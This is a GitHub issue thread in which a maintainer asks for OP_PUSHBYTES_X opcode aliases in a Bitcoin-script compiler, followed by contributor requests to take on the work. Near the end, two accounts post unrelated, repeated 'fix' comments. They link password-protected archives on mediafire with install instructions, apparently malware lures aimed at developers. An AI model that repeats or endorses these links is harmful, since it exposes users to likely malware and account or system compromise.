### ISSUE TITLE
[feat] Support OP_PUSHBYTES_X in compiler

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#165]
Currently, the compiler uses the term `OP_DATA_X` for opcodes 0x01-0x4b, but some Bitcoin script sources use the term `OP_PUSHBYTES_X` instead of `OP_DATA_X`. We should support these in the compiler by adding the `OP_PUSHBYTES_1`-`OP_PUSHBYTES_75` opcodes, which will map to the equivalent `OP_DATA_X` ops.

[compiler](https://github.com/keep-starknet-strange/shinigami/blob/main/src/compiler.cairo)

**Comment by od-hunter** [comment]
Can I do this please

**Comment by od-hunter** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/shinigami).

### My background and how it can be leveraged
I am a blockchain developer and I would love to be assigned this please

**Comment by ShantelPeters** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/shinigami).

### My background and how it can be leveraged
hello can i work on this

**Comment by ShantelPeters** [comment]
hello @b-j-roberts can i work on this

**Comment by martinvibes** [comment]
hello @b-j-roberts please can i work on this

**Comment by PavitraAgarwal21** [comment]
Hey @b-j-roberts  can I work on this as this is my first contribution to the shinigami

**Comment by NueloSE** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/shinigami).

### My background and how it can be leveraged
I have experience working on compilers and blockchain technology, where attention to detail and deep understanding of low-level operations are crucial. My familiarity with opcode mapping and script standards in Bitcoin allows me to effectively integrate and extend existing functionality. This background enables me to implement support for new opcodes like OP_PUSHBYTES_X while maintaining consistency with the current system.

### How I plan on tackling this issue
I’d begin by reviewing the compiler’s handling of existing OP_DATA_X opcodes and understanding how they are mapped. I would then analyze the Bitcoin script sources using OP_PUSHBYTES_X terminology to ensure the implementation aligns with those standards. The next step would be to add the OP_PUSHBYTES_1-75 opcodes in the compiler and map them to the corresponding OP_DATA_X equivalents. I’d validate the changes through rigorous testing to confirm that the new opcodes work seamlessly within the existing framework while maintaining backward compatibility.

**Comment by petersdt** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/shinigami).

### My background and how it can be leveraged
I have experience in compiler design and blockchain technology, particularly in handling opcodes and script languages. My background includes working with low-level operations in Bitcoin scripts, enabling me to adapt and extend compiler functionality. This experience is directly applicable to implementing support for OP_PUSHBYTES_X opcodes in alignment with existing OP_DATA_X mappings.




### How I plan on tackling this issue

I would first examine the current handling of OP_DATA_X opcodes in the compiler to understand how they are mapped. Next, I’d research Bitcoin script sources that utilize the OP_PUSHBYTES_X terminology to ensure compatibility. My approach involves introducing the OP_PUSHBYTES_1-75 opcodes and mapping them directly to the equivalent OP_DATA_X codes in the compiler. Comprehensive testing will be conducted to ensure these new opcodes integrate smoothly, maintaining both functionality and consistency across the system.

**Comment by b-j-roberts** [comment]
@od-hunter thanks, let me know if you have questions!

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mubarak23** [comment]
@b-j-roberts let work, i have an idea on how to solve this
